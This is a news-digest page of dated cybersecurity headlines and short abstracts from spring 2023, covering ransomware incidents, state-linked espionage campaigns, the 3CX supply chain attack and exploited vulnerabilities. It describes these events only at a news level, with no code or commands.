CERT-UA Warns of SmokeLoader and RoarBAT Malware Attacks Against Ukraine
Abstract
An ongoing phishing campaign with invoice-themed lures is being used to distribute the SmokeLoader malware in the form of a polyglot file, according to the Computer Emergency Response Team of Ukraine (CERT-UA). The emails, per the agency, are sent using compromised accounts and come with a ZIP archive that, in reality, is a polyglot file containing a decoy document and a JavaScript file. The JavaScript code is then used to launch an executable that paves the way for the execution of the SmokeLoader malware. SmokeLoader, first detected in 2011, is a loader whose main objective is to download or load a stealthier or more effective malware onto infected systems. CERT-UA attributed the activity to a threat actor it calls UAC-0006 and characterized it as a financially motivated operation carried out with the goal of stealing credentials and making unauthorized fund transfers. In a related advisory, Ukraine's cybersecurity authority also revealed details of destructive attacks orch...
Source: The Hacker News
May 6, 2023
Drone Goggles Maker Orqa Hit with 'Time-bomb' Ransomware Attack
Abstract
Orqa, a maker of FPV drone racing goggles, claimed that a contractor introduced code into the firmware of the devices, designed to brick them as a time bomb. Findings say that the contractor had been in business relations with Orqa for several years and had waited for the code bomb to detonate...
Source: Cyware
May 5, 2023
Pro-Russian Hackers Claim Downing of French Senate Website
Abstract
"Access to the site has been disrupted since this morning," the upper house of Parliament said on Twitter shortly before midday, saying a team was busy fixing the problem.
Source: Cyware
May 05, 2023
ALPHV gang claims ransomware attack on Constellation Software
Abstract
Canadian diversified software company Constellation Software confirmed on Thursday that some of its systems were breached by threat actors who also stole personal information and business data.
Source: BleepingComputer
May 4, 2023
Researchers Observe a Spike in Attacks Against TBK DVR Camera Devices
Abstract
FortiGuard Labs warned of attackers exploiting a five-year-old authentication bypass vulnerability in TBK DVR devices, which have over 600,000 cameras and 50,000 recorders installed globally, posing a significant threat to camera video feeds. A remote attacker can also exploit the flaw to bypass a...
Source: Cyware
May 04, 2023
Meta Takes Down Malware Campaign That Used ChatGPT as a Lure to Steal Accounts
Abstract
Meta said it took steps to take down more than 1,000 malicious URLs from being shared across its services that were found to leverage OpenAI's ChatGPT as a lure to propagate about 10 malware families since March 2023. The development comes against the backdrop of fake ChatGPT web browser extensions being increasingly used to steal users' Facebook account credentials with an aim to run unauthorized ads from hijacked business accounts. "Threat actors create malicious browser extensions available in official web stores that claim to offer ChatGPT-based tools," Meta said. "They would then promote these malicious extensions on social media and through sponsored search results to trick people into downloading malware." The social media giant said it has blocked several iterations of a multi-pronged malware campaign dubbed Ducktail over the years, adding it issued a cease and desist letter to individuals behind the operation who are located in Vietna...
Source: The Hacker News
May 2, 2023
Earth Longzhi Returns With New Tricks to Target Organizations in Taiwan, Thailand, the Philippines, and Fiji
Abstract
The campaign, which came after months of inactivity, was found to abuse a Windows Defender executable for DLL sideloading and exploit a vulnerable driver, zamguard.sys, to disable security products through a bring-your-own-vulnerable-driver attack.
Source: Cyware
May 2, 2023
Bluefield University, BridgeValley Community and Technical College, and Penncrest School District Suffer Cyberattacks
Abstract
This week, thousands of students at several U.S. schools, such as Bluefield University, BridgeValley Community and Technical College, Penncrest School District, and Truman State University, are feeling the impact of ransomware and other cyberattacks.
Source: Cyware
May 2, 2023
Fortinet warns of a spike in attacks against TBK DVR devices
Abstract
FortiGuard Labs researchers are warning of a spike in malicious attacks targeting TBK DVR devices. Threat actors are attempting to exploit a five-year-old authentication bypass issue, tracked as CVE-2018-9995 (CVSS score of 9.8), in TBK DVR devices.
Source: Cyware
May 2, 2023
Australian Law Firm HWL Ebsworth Hit by Russian-linked Ransomware Attack
Abstract
Late last week, the ALPHV/Blackcat ransomware group posted on its website that 4TB of company data had been hacked, including employee CVs, IDs, financial reports, accounting data, client documentation, credit card data, and a complete network map.
Source: Cyware
May 1, 2023
Nashua School District hit by 'sophisticated' cyberattack
Abstract
"We are working diligently to investigate the incident, confirm its impact on our systems, and securely restore functionality to our environment as soon as possible," the district said in a statement.
Source: Cyware
May 1, 2023
German IT provider Bitmarck hit by cyberattack
Abstract
Bitmarck, one of the largest IT service providers for social insurance carriers in Germany, announced yesterday that it has suffered a cyber attack. The German IT service provider Bitmarck announced on April 30 it had taken all its systems offline...
Source: Security Affairs
April 28, 2023
UK school hit by ransomware attack
Abstract
A school in Wiltshire was hit by a ransomware attack last weekend. Hardenhuish School, a mixed secondary academy in Chippenham, sent texts to parents and guardians of its 1,623 pupils notifying them of the attack.
Source: Cyware
April 28, 2023
South Carolina's Spartanburg County Suffers Ransomware Attack
Abstract
A ransomware attack has been reported in Spartanburg County. WYFF News 4 reached out to Spartanburg County officials and the South Carolina Judicial Branch after hearing about a possible computer issue.
Source: Cyware
April 28, 2023
Tonto Team Uses Anti-Malware File to Launch Attacks on South Korean Institutions
Abstract
South Korean education, construction, diplomatic, and political institutions are at the receiving end of new attacks perpetrated by a China-aligned threat actor known as the Tonto Team. "Recent cases have revealed that the group is using a file related to anti-malware products to ultimately execute their malicious attacks," the AhnLab Security Emergency Response Center (ASEC) said in a report published this week. Tonto Team, active since at least 2009, has a track record of targeting various sectors across Asia and Eastern Europe. Earlier this year, the group was attributed to an unsuccessful phishing attack on cybersecurity company Group-IB. The attack sequence discovered by ASEC starts with a Microsoft Compiled HTML Help (.CHM) file that executes a binary file to side-load a malicious DLL file (slc.dll) and launch ReVBShell, an open source VBScript backdoor also put to use by another Chinese threat actor called Tick. ReVBShell is subsequently leveraged to do...
Source: The Hacker News
April 27, 2023
Paperbug Attack: New Politically-Motivated Surveillance Campaign in Tajikistan Full Text
Abstract
A little-known Russian-speaking cyber-espionage group has been linked to a new politically-motivated surveillance campaign targeting high-ranking government officials, telecom services, and public service infrastructures in Tajikistan. The intrusion set, dubbed Paperbug by Swiss cybersecurity company PRODAFT, has been attributed to a threat actor known as Nomadic Octopus (aka DustSquad). "The types of compromised machines range from individuals' computers to [operational technology] devices," PRODAFT said in a deep dive technical report shared with The Hacker News. "These targets make operation 'Paperbug' intelligence-driven." The ultimate motive behind the attacks is unclear at this stage, but the cybersecurity firm has raised the possibility that it could be the work of opposition forces within the country or, alternatively, an intelligence-gathering mission carried out by Russia or China. Nomadic Octopus first came to light in October 2018 w...The Hacker News
April 26, 2023
Pro-Russia hacking group executed a disruptive attack against a Canadian gas pipeline Full Text
Abstract
Pro-Russia hacking group Zarya caused a cybersecurity incident at a Canadian gas pipeline; the critical infrastructure sector is on alert. A Canadian gas pipeline suffered a cyber security incident, Canada’s top cyber official and Pro-Russia hacking...Security Affairs
April 25, 2023
Iranian Hackers Launch Sophisticated Attacks Targeting Israel with PowerLess Backdoor Full Text
Abstract
An Iranian nation-state threat actor has been linked to a new wave of phishing attacks targeting Israel that's designed to deploy an updated version of a Windows backdoor called PowerLess. Cybersecurity firm Check Point is tracking the activity cluster under its mythical creature handle Educated Manticore, which exhibits "strong overlaps" with a hacking crew known as APT35, Charming Kitten, Cobalt Illusion, ITG18, Mint Sandstorm (formerly Phosphorus), TA453, and Yellow Garuda. "Like many other actors, Educated Manticore has adopted recent trends and started using ISO images and possibly other archive files to initiate infection chains," the Israeli company said in a technical report published today. Active since at least 2011, APT35 has cast a wide net of targets by leveraging fake social media personas, spear-phishing techniques, and N-day vulnerabilities in internet-exposed applications to gain initial access and drop various payloads, includi...The Hacker News
April 24, 2023
New Blind Eagle Attack Chain Discovered Full Text
Abstract
The Blind Eagle cyberespionage group was identified as the source of a new multi-stage attack chain that ultimately results in the deployment of NjRAT on compromised systems. In this attack campaign, Blind Eagle leverages social engineering, custom malware, and spear-phishing attacks. Therefore, up ...Cyware
April 23, 2023
Health insurer Point32Health suffered a ransomware attack Full Text
Abstract
Non-profit health insurer Point32Health suffered a ransomware attack and has taken systems offline in response to the incident. Non-profit health insurer Point32Health has taken systems offline in response to a ransomware attack that took place on April...Security Affairs
April 22, 2023
Lazarus X_TRADER Hack Impacts Critical Infrastructure Beyond 3CX Breach Full Text
Abstract
Lazarus, the prolific North Korean hacking group behind the cascading supply chain attack targeting 3CX, also breached two critical infrastructure organizations in the power and energy sector and two other businesses involved in financial trading using the trojanized X_TRADER application. The new findings, which come courtesy of Symantec's Threat Hunter Team, confirm earlier suspicions that the X_TRADER application compromise affected more organizations than 3CX. The names of the organizations were not revealed. Eric Chien, director of security response at Broadcom-owned Symantec, told The Hacker News in a statement that the attacks took place between September 2022 and November 2022. "The impact from these infections is unknown at this time – more investigation is required and is on-going," Chien said, adding it's possible that there's "likely more to this story and possibly even other packages that are trojanized." The development comes as Ma...The Hacker News
April 21, 2023
Pro-Russia hackers launched a massive attack against the EUROCONTROL agency Full Text
Abstract
Pro-Russia hackers KillNet launched a massive DDoS attack against Europe’s air-traffic agency EUROCONTROL. Europe’s air-traffic control agency EUROCONTROL announced that it was under attack from pro-Russian hackers. The European Organisation...Security Affairs
April 21, 2023
N.K. Hackers Employ Matryoshka Doll-Style Cascading Supply Chain Attack on 3CX Full Text
Abstract
The supply chain attack targeting 3CX was the result of a prior supply chain compromise associated with a different company, demonstrating a new level of sophistication with North Korean threat actors. Google-owned Mandiant, which is tracking the attack event under the moniker UNC4736, said the incident marks the first time it has seen a "software supply chain attack lead to another software supply chain attack." The Matryoshka doll-style cascading attack against 3CX first came to light on March 29, 2023, when it emerged that Windows and macOS versions of its communication software were trojanized to deliver a C/C++-based data miner named ICONIC Stealer by means of a downloader, SUDDENICON, that used icon files hosted on GitHub to extract the server containing the stealer. "The malicious application next attempts to steal sensitive information from the victim user's web browser," the U.S. Cybersecurity and Infrastructure Security Agency (CISA) said...The Hacker News
April 20, 2023
Daggerfly Cyberattack Campaign Hits African Telecom Services Providers Full Text
Abstract
Telecommunication services providers in Africa are the target of a new campaign orchestrated by a China-linked threat actor at least since November 2022. The intrusions have been pinned on a hacking crew tracked by Symantec as Daggerfly, and which is also tracked by the broader cybersecurity community as Bronze Highland and Evasive Panda. The campaign makes use of "previously unseen plugins from the MgBot malware framework," the cybersecurity company said in a report shared with The Hacker News. "The attackers were also seen using a PlugX loader and abusing the legitimate AnyDesk remote desktop software." Daggerfly's use of the MgBot loader (aka BLame or MgmBot) was spotlighted by Malwarebytes in July 2020 as part of phishing attacks aimed at Indian government personnel and individuals in Hong Kong. According to a profile published by Secureworks, the threat actor uses spear-phishing as an initial infection vector to drop MgBot as well as other...The Hacker News
April 19, 2023
Blind Eagle Cyber Espionage Group Strikes Again: New Attack Chain Uncovered Full Text
Abstract
The cyber espionage actor tracked as Blind Eagle has been linked to a new multi-stage attack chain that leads to the deployment of the NjRAT remote access trojan on compromised systems. "The group is known for using a variety of sophisticated attack techniques, including custom malware, social engineering tactics, and spear-phishing attacks," ThreatMon said in a Tuesday report. Blind Eagle, also referred to as APT-C-36, is a suspected Spanish-speaking group that chiefly strikes private and public sector entities in Colombia. Attacks orchestrated by the group have also targeted Ecuador, Chile, and Spain. Infection chains documented by Check Point and BlackBerry this year have revealed the use of spear-phishing lures to deliver commodity malware families like BitRAT, AsyncRAT, and in-memory Python loaders capable of launching a Meterpreter payload. The latest discovery from ThreatMon entails the use of a JavaScript downloader to execute a PowerShell script hosted...The Hacker News
April 17, 2023
German Arms Manufacturer Rheinmetall Targeted in Cyberattack Full Text
Abstract
Over the weekend, Rheinmetall, a leading German armaments and technology company, was the victim of a cyberattack that targeted all three of its divisions. However, company officials have stated that the attack did not impact operations.Cyware
April 17, 2023
NCR Says it was hit by BlackCat Ransomware Attack Full Text
Abstract
NCR is suffering an outage on its Aloha point of sale (PoS) platform since Wednesday after it was hit by a ransomware attack conducted by the BlackCat/ALPHV ransomware group.Cyware
April 16, 2023
Remcos RAT campaign targets US accounting and tax return preparation firms Full Text
Abstract
Microsoft warns of a new Remcos RAT campaign targeting US accounting and tax return preparation firms ahead of Tax Day. Ahead of the U.S. Tax Day, Microsoft has observed a new Remcos RAT campaign targeting US accounting and tax return preparation...Security Affairs
April 15, 2023
Forensic Analysis Confirms Involvement of North Korean Attackers in 3CX Supply Chain Attack Full Text
Abstract
3CX confirmed that the software supply chain attack was the work of a North Korean hacker group, UNC4736. The group used the Taxhaul and Simplesea malware for infecting Windows and macOS, respectively. Attackers used Taxhaul (or TxRLoader) to target Windows machines, which was further used to deplo ...Cyware
April 14, 2023
Russia-Linked Hackers Launch Espionage Attacks on Foreign Diplomatic Entities Full Text
Abstract
The Russia-linked APT29 (aka Cozy Bear) threat actor has been attributed to an ongoing cyber espionage campaign targeting foreign ministries and diplomatic entities located in NATO member states, the European Union, and Africa. According to Poland's Military Counterintelligence Service and the CERT Polska team, the observed activity shares tactical overlaps with a cluster tracked by Microsoft as Nobelium, which is known for its high-profile attack on SolarWinds in 2020. Nobelium's operations have been attributed to Russia's Foreign Intelligence Service (SVR), an organization that's tasked with protecting "individuals, society, and the state from foreign threats." That said, the campaign represents an evolution of the Kremlin-backed hacking group's tactics, indicating persistent attempts at improving its cyber weaponry to infiltrate victim systems for intelligence gathering. "New tools were used at the same time and independently of eac...The Hacker News
April 14, 2023
A cyberattack on the Cornwall Community Hospital in Ontario is causing treatment delays Full Text
Abstract
The Cornwall Community Hospital in Ontario, Canada, is under a cyber attack that is causing delays to scheduled and non-urgent care. A cyberattack on the Cornwall Community Hospital in Ontario, Canada, is causing delays to scheduled and non-urgent...Security Affairs
April 12, 2023
North Korean Hackers Uncovered as Mastermind in 3CX Supply Chain Attack Full Text
Abstract
Enterprise communications service provider 3CX confirmed that the supply chain attack targeting its desktop application for Windows and macOS was the handiwork of a threat actor with North Korean nexus. The findings are the result of an interim assessment conducted by Google-owned Mandiant, whose services were enlisted after the intrusion came to light late last month. The threat intelligence and incident response unit is tracking the activity under its uncategorized moniker UNC4736. It's worth noting that cybersecurity firm CrowdStrike has attributed the attack to a Lazarus sub-group dubbed Labyrinth Chollima, citing tactical overlaps. The attack chain, based on analyses from multiple security vendors, entailed the use of DLL side-loading techniques to load an information stealer known as ICONIC Stealer, followed by a second-stage called Gopuram in selective attacks aimed at crypto companies. Mandiant's forensic investigation has now revealed that the threat acto...The Hacker News
April 11, 2023
A cyber attack hit the water controllers for irrigating fields in the Jordan Valley Full Text
Abstract
A cyber attack paralyzed the water controllers for irrigating fields in the Jordan Valley that are operated by the Galil Sewage Corporation. A cyberattack blocked several controllers for irrigating fields in the Jordan Valley. The systems operated...Security Affairs
April 10, 2023
Over 1 Million WordPress Sites Infected by Balada Injector Malware Campaign Full Text
Abstract
Over one million WordPress websites are estimated to have been infected by an ongoing campaign to deploy malware called Balada Injector since 2017. The massive campaign, per GoDaddy's Sucuri, "leverages all known and recently discovered theme and plugin vulnerabilities" to breach WordPress sites. The attacks are known to play out in waves once every few weeks. "This campaign is easily identified by its preference for String.fromCharCode obfuscation, the use of freshly registered domain names hosting malicious scripts on random subdomains, and by redirects to various scam sites," security researcher Denis Sinegubko said. The websites include fake tech support, fraudulent lottery wins, and rogue CAPTCHA pages urging users to turn on notifications to 'Please Allow to verify, that you are not a robot,' thereby enabling the actors to send spam ads. The report builds on recent findings from Doctor Web, which detailed a Linux malware family th...The Hacker News
April 08, 2023
Taiwanese PC Company MSI Falls Victim to Ransomware Attack Full Text
Abstract
Taiwanese PC company MSI (short for Micro-Star International) officially confirmed it was the victim of a cyber attack on its systems. The company said it "promptly" initiated incident response and recovery measures after detecting "network anomalies." It also said it alerted law enforcement agencies of the matter. That said, MSI did not disclose any specifics about when the attack took place and if it entailed the exfiltration of any proprietary information, including source code. "Currently, the affected systems have gradually resumed normal operations, with no significant impact on financial business," the company said in a brief notice shared on Friday. In a regulatory filing with the Taiwan Stock Exchange, it said that it's setting up enhanced controls of its network and infrastructure to ensure the security of data. MSI is further urging users to obtain firmware/BIOS updates only from its official website, and refrain from downloading...The Hacker News
April 8, 2023
Color1337: Linux Cryptomining Attack Campaign Used uhQCCSpB Bot Full Text
Abstract
The attackers use a bot called uhQCCSpB that installs and launches a Monero miner on the infected machine. After killing all other miners on the device, the attacker uses two different strategies to maximize access to the compromised Linux machine.Cyware
April 08, 2023
Iran-Based Hackers Caught Carrying Out Destructive Attacks Under Ransomware Guise Full Text
Abstract
The Iranian nation-state group known as MuddyWater has been observed carrying out destructive attacks on hybrid environments under the guise of a ransomware operation. That's according to new findings from the Microsoft Threat Intelligence team, which discovered the threat actor targeting both on-premises and cloud infrastructures in partnership with another emerging activity cluster dubbed DEV-1084. "While the threat actors attempted to masquerade the activity as a standard ransomware campaign, the unrecoverable actions show destruction and disruption were the ultimate goals of the operation," the tech giant revealed Friday. MuddyWater is the name assigned to an Iran-based actor that the U.S. government has publicly connected to the country's Ministry of Intelligence and Security (MOIS). It's been known to be active since at least 2017. It's also tracked by the cybersecurity community under various names, including Boggy Serpens, Cobalt Ulster,...The Hacker News
April 8, 2023
Belgium’s Herselt Municipality Hit by Cyberattack Full Text
Abstract
The cyberattack was detected on Friday evening (07-04-2023), and security measures were immediately heightened. Currently, experts are combing through the municipality’s servers to determine whether any sensitive information has been accessed.Cyware
April 6, 2023
Money Message ransomware group claims to have hacked IT giant MSI Full Text
Abstract
Ransomware gang Money Message claims to have hacked the Taiwanese multinational IT corporation MSI (Micro-Star International). Ransomware gang Money Message announced that it had hacked the Taiwanese multinational IT corporation MSI (Micro-Star International)....Security Affairs
April 6, 2023
Update: 3CX makes progress in restoring Windows app from state-linked supply chain attack Full Text
Abstract
The business communications company restored its Windows Electron app, making progress in its ongoing recovery from a recent supply chain attack, CEO Nick Galea said in a forum post on Tuesday.Cyware
April 5, 2023
New Proxyjacking Attack Exploits Log4j for Initial Access Full Text
Abstract
Researchers at Sysdig highlight that the new Proxyjacking attack, which is much like cryptojacking, is abusing the infamous Log4j vulnerability to gain initial access to victims’ systems. On a broader scale, researchers note that a modest compromise of 100 IPs can enable attackers to make a profit ...Cyware
April 5, 2023
Exploited Elementor Pro Plugin Under Attack; Affects Over 11 Million Sites Full Text
Abstract
A security vulnerability in the Elementor Pro website builder plugin for WordPress is under active exploitation by a threat actor. An authenticated user can take advantage of this to take full control over a WordPress site having WooCommerce enabled. The bug in the plugin, roughly deployed on over ...Cyware
April 05, 2023
Google TAG Warns of North Korean-linked ARCHIPELAGO Cyberattacks Full Text
Abstract
A North Korean government-backed threat actor has been linked to attacks targeting government and military personnel, think tanks, policy makers, academics, and researchers in South Korea and the U.S. Google's Threat Analysis Group (TAG) is tracking the cluster under the name ARCHIPELAGO, which it said is a subset of another threat group tracked by Mandiant under the name APT43. The tech giant said it began monitoring the hacking crew in 2012, adding it has "observed the group target individuals with expertise in North Korea policy issues such as sanctions, human rights, and non-proliferation issues." The priorities of APT43, and by extension ARCHIPELAGO, are said to align with North Korea's Reconnaissance General Bureau (RGB), the primary foreign intelligence service, suggesting overlaps with a group broadly known as Kimsuky. Attack chains mounted by ARCHIPELAGO involve the use of phishing emails containing malicious links that, when clicked by the reci...The Hacker News
April 04, 2023
Arid Viper Hacking Group Using Upgraded Malware in Middle East Cyber Attacks Full Text
Abstract
The threat actor known as Arid Viper has been observed using refreshed variants of its malware toolkit in its attacks targeting Palestinian entities since September 2022. Symantec, which is tracking the group under its insect-themed moniker Mantis, said the adversary is "going to great lengths to maintain a persistent presence on targeted networks." Also known by the names APT-C-23 and Desert Falcon, the hacking group has been linked to attacks aimed at Palestine and the Middle East at least since 2014. Mantis has used an arsenal of homemade malware tools such as ViperRat, FrozenCell (aka VolatileVenom), and Micropsia to execute and conceal its campaigns across Windows, Android, and iOS platforms. The threat actors are believed to be native Arabic speakers and based in Palestine, Egypt, and Turkey, according to a report published by Kaspersky in February 2015. Prior public reporting has also tied the group to the cyber warfare division of Hamas. In Apri...The Hacker News
April 04, 2023
Cryptocurrency Companies Targeted in Sophisticated 3CX Supply Chain Attack Full Text
Abstract
The adversary behind the supply chain attack targeting 3CX deployed a second-stage implant specifically singling out a small number of cryptocurrency companies. Russian cybersecurity firm Kaspersky, which has been internally tracking the versatile backdoor under the name Gopuram since 2020, said it observed an increase in the number of infections in March 2023 coinciding with the 3CX breach. Gopuram's primary function is to connect to a command-and-control (C2) server and await further instructions that allow the attackers to interact with the victim's file system, create processes, and launch as many as eight in-memory modules. The backdoor's links to North Korea stem from the fact that it "co-existed on victim machines with AppleJeus, a backdoor attributed to the Korean-speaking threat actor Lazarus," detailing an attack on an unnamed crypto firm located in Southeast Asia in 2020. The targeting of cryptocurrency companies is another telltale sign of...The Hacker News
April 3, 2023
UK outsourcing services provider Capita suffered a cyber incident Full Text
Abstract
UK outsourcing services provider Capita confirmed that the outage suffered on Friday was caused by a cyberattack. Capita, the UK outsourcing giant, confirmed that its staff was locked out of their accounts on Friday after a cyber incident. Capita...Security Affairs
April 3, 2023
Mustang Panda Cyberespionage Strikes Over 200 Targets Full Text
Abstract
Researchers discovered that a series of cyberespionage attacks launched by the subgroups of Earth Preta APT has affected over 200 organizations. While some of these subgroups are focused on stealing intellectual property and business information, others target government and diplomatic entities.Cyware
March 30, 2023
3CX voice and video conferencing software victim of a supply chain attack Full Text
Abstract
Popular voice and video conferencing software 3CX was the victim of a supply chain attack, SentinelOne researchers reported. As of Mar 22, 2023, SentinelOne observed a spike in behavioral detections of the 3CXDesktopApp, which is a popular voice and video...Security Affairs
March 30, 2023
3CX Desktop App Supply Chain Attack Leaves Millions at Risk - Urgent Update on the Way! Full Text
Abstract
3CX said it's working on a software update for its desktop app after multiple cybersecurity vendors sounded the alarm on what appears to be an active supply chain attack that's using digitally signed and rigged installers of the popular voice and video conferencing software to target downstream customers. "The trojanized 3CX desktop app is the first stage in a multi-stage attack chain that pulls ICO files appended with Base64 data from GitHub and ultimately leads to a third-stage infostealer DLL," SentinelOne researchers said. The cybersecurity firm is tracking the activity under the name SmoothOperator, stating the threat actor registered a massive attack infrastructure as far back as February 2022. There are indications that the attack may have commenced around March 22, 2023. 3CX, the company behind 3CXDesktopApp, claims to have more than 600,000 customers and 12 million users in 190 countries, some of which include well-known names like American Expres...The Hacker News
March 29, 2023
Clipper attacks use Trojanized TOR Browser installers Full Text
Abstract
Researchers discovered malware-laced installers for the TOR browser that is spreading clipper malware in Russia and Eastern Europe. Kaspersky researchers discovered a Trojanized version of the Tor Browser that is spreading a clipper malware in Russia...Security Affairs
March 29, 2023
Google Found Two Spyware Campaigns Targeting Apple and Android Devices Full Text
Abstract
The company did not reveal the spyware vendors involved but said one of the campaigns used a link directing targets to a landing page identical to one Google revealed in November 2022 from Spanish spyware firm Variston IT.Cyware
March 28, 2023
Lumen Technologies hit with two separate security incidents Full Text
Abstract
The company has notified law enforcement and is working with outside firms to contain the incidents, according to the filing. It has begun business continuity efforts to restore functionality to its customers’ systems.Cyware
March 28, 2023
Telecom giant Lumen suffered a ransomware attack and discloses a second incident Full Text
Abstract
Telecommunications giant Lumen Technologies discovered two cybersecurity incidents, including a ransomware attack. In a filing to the Securities and Exchange Commission, on March 27, 2023, Lumen announced two cybersecurity incidents. One of the incidents...Security Affairs
March 27, 2023
Operation Tainted Love: New Cyberespionage Campaign by Chinese Full Text
Abstract
A Chinese cyber-espionage campaign, named Operation Tainted Love—associated with Operation Soft Cell—has been found hitting telecommunications providers in the Middle East since Q1 2023. Operation Soft Cell relies heavily on a custom credential theft malware, mim221.Cyware
March 27, 2023
Hackers Attack Wisconsin Court System Computer Network Full Text
Abstract
The attack has not resulted in the breach of any data and court operations are continuing as usual statewide, state Supreme Court Chief Justice Annette Ziegler said in a statement.Cyware
March 26, 2023
Vice Society claims attack on Puerto Rico Aqueduct and Sewer Authority Full Text
Abstract
Puerto Rico Aqueduct and Sewer Authority (PRASA) is investigating a cyber attack with the help of the FBI and US CISA. The Puerto Rico Aqueduct and Sewer Authority (PRASA) is investigating a cyberattack that last week hit the agency. The agency quickly...Security Affairs
March 24, 2023
City of Toronto is one of the victims hacked by Clop gang using GoAnywhere zero-day Full Text
Abstract
Clop ransomware gang added the City of Toronto to the list of its victims; it is another organization compromised by exploiting the GoAnywhere zero-day. Clop ransomware gang added the City of Toronto to the list of victims published on its Tor leak...Security Affairs
March 24, 2023
City of Toronto and Financing Firm Investissement Québec Confirm Being Hit by Ransomware Attack Full Text
Abstract
“Today, the City of Toronto has confirmed that unauthorized access to City data did occur through a third party vendor. The access is limited to files that were unable to be processed through the third-party secure file transfer system,” it said.Cyware
March 23, 2023
Skylink hit by hacker attack Full Text
Abstract
M7 Group’s Czech and Slovak operator Skylink has reportedly fallen victim to a hacker attack. Skylink offers DTH and internet TV services in the Czech Republic and Slovakia.Cyware
March 20, 2023
TeamTNT Allegedly Connected to SCARLETEEL Decoy Attack Full Text
Abstract
The SCARLETEEL sophisticated hacking operation, which targets Kubernetes hosted on Amazon to steal confidential proprietary data, is also suspected to have a TeamTNT touch. Despite all the similarities, researchers could not connect the two with full confidence. According to them, it is possible ...Cyware
March 20, 2023
Play ransomware gang hit Dutch shipping firm Royal Dirkzwager Full Text
Abstract
Dutch maritime logistics company Royal Dirkzwager suffered a ransomware attack; the company was hit by the Play ransomware gang. The Play ransomware group hit the Dutch maritime logistics company Royal Dirkzwager. Royal Dirkzwager is specialized...Security Affairs
March 16, 2023
Multiple threat actors exploited Progress Telerik bug to breach U.S. federal agency Full Text
Abstract
Multiple threat actors exploited a critical flaw in Progress Telerik to breach an unnamed US federal agency, said the US government. A joint advisory issued by the Cybersecurity and Infrastructure Security Agency (CISA), Federal Bureau of Investigation...Security Affairs
March 16, 2023
Multiple Hacker Groups Exploit 3-Year-Old Vulnerability to Breach U.S. Federal Agency Full Text
Abstract
Multiple threat actors, including a nation-state group, exploited a critical three-year-old security flaw in Progress Telerik to break into an unnamed federal entity in the U.S. The disclosure comes from a joint advisory issued by the Cybersecurity and Infrastructure Security Agency (CISA), Federal Bureau of Investigation (FBI), and Multi-State Information Sharing and Analysis Center (MS-ISAC). "Exploitation of this vulnerability allowed malicious actors to successfully execute remote code on a federal civilian executive branch (FCEB) agency's Microsoft Internet Information Services (IIS) web server," the agencies said. The indicators of compromise (IoCs) associated with the digital break-in were identified from November 2022 through early January 2023. Tracked as CVE-2019-18935 (CVSS score: 9.8), the issue relates to a .NET deserialization vulnerability affecting Progress Telerik UI for ASP.NET AJAX that, if left unpatched, could lead to remote code exec...The Hacker News
March 15, 2023
Ring Denies Falling Victim to Ransomware Attack Full Text
Abstract
On Monday, the cybergang behind the Alphv ransomware added an entry to their leaks site claiming they breached Ring and threatening to release data supposedly stolen from the company.Cyware
March 15, 2023
YoroTrooper Espionage Campaigns Targeting CIS Countries, Embassies, and EU Healthcare Agency Full Text
Abstract
YoroTrooper’s main tools include Python-based, custom-built, and open-source information stealers, such as the Stink stealer wrapped into executables via the Nuitka framework and PyInstaller.Cyware
March 14, 2023
Hospital in Brussels latest victim in spate of European healthcare cyberattacks Full Text
Abstract
Ambulances were diverted from the Centre Hospitalier Universitaire (CHU) Saint-Pierre this weekend following the attack in the early hours of Friday morning. Details about the attack and the perpetrators have not yet been disclosed.Cyware
March 14, 2023
Advanced actor targets Fortinet FortiOS in attacks on govt entities Full Text
Abstract
An unknown threat actor is targeting government entities and large organizations by exploiting a security flaw in Fortinet FortiOS. Fortinet researchers are warning of an advanced threat actor that is targeting governmental or government-related entities. The...Security Affairs
March 13, 2023
Large-scale Cyber Attack Hijacks East Asian Websites for Adult Content Redirects Full Text
Abstract
A widespread malicious cyber operation has hijacked thousands of websites aimed at East Asian audiences to redirect visitors to adult-themed content since early September 2022. The ongoing campaign entails injecting malicious JavaScript code into the hacked websites, often connecting to the target web server using legitimate FTP credentials the threat actor previously obtained via an unknown method. "In many cases, these were highly secure auto-generated FTP credentials which the attacker was somehow able to acquire and leverage for website hijacking," Wiz said in a report published this month. The fact that the breached websites – owned by both small firms and multinational corporations – utilize different tech stacks and hosting service providers has made it difficult to trace a common attack vector, the cloud security company noted. That said, one of the common denominators between the websites is that a majority of them are either hosted in China or hosted in...The Hacker News
March 13, 2023
Estonian official says parliamentary elections were targeted by cyberattacks Full Text
Abstract
Gert Auväärt, head of the National Cyber Security Centre-Estonia (NCSC-EE), told The Record that his team had been in a “heightened awareness level for two weeks” during the campaign, and that attempts to enter the electoral system were unsuccessful.Cyware
March 13, 2023
KamiKakaBot Malware Used in Latest Dark Pink APT Attacks on Southeast Asian Targets Full Text
Abstract
The Dark Pink advanced persistent threat (APT) actor has been linked to a fresh set of attacks targeting government and military entities in Southeast Asian countries with a malware called KamiKakaBot. Dark Pink, also called Saaiwc, was extensively profiled by Group-IB earlier this year, describing its use of custom tools such as TelePowerBot and KamiKakaBot to run arbitrary commands and exfiltrate sensitive information. The threat actor is suspected to be of Asia-Pacific origin and has been active since at least mid-2021, with an increased tempo observed in 2022. "The latest attacks, which took place in February 2023, were almost identical to previous attacks," Dutch cybersecurity company EclecticIQ disclosed in a new report published last week. "The main difference in the February campaign is that the malware's obfuscation routine has improved to better evade anti-malware measures." The attacks play out in the form of social engineering lures that ... (The Hacker News)
March 08, 2023
Sharp Panda Using New Soul Framework Version to Target Southeast Asian Governments Full Text
Abstract
High-profile government entities in Southeast Asia are the target of a cyber espionage campaign undertaken by a Chinese threat actor known as Sharp Panda since late last year. The intrusions are characterized by the use of a new version of the Soul modular framework, marking a departure from the group's attack chains observed in 2021. Israeli cybersecurity company Check Point said the "long-running" activities have historically singled out countries such as Vietnam, Thailand, and Indonesia. Sharp Panda was first documented by the firm in June 2021, describing it as a "highly-organized operation that placed significant effort into remaining under the radar." Interestingly, the use of the Soul backdoor was detailed by Broadcom's Symantec in October 2021 in connection to an unattributed espionage operation targeting defense, healthcare, and ICT sectors in Southeast Asia. The implant's origins, according to research published by Fortinet FortiG... (The Hacker News)
March 8, 2023
Update: Israel blames state-sponsored Iranian hackers for ransomware attack on university Full Text
Abstract
The attack in February forced the Israel Institute of Technology (Technion) to postpone exams and shut down its IT systems. The incident followed what Israeli defense officials said were dozens of attempted Iranian cyberattacks over the past year. (Cyware)
March 7, 2023
SYS01 stealer targets critical government infrastructure Full Text
Abstract
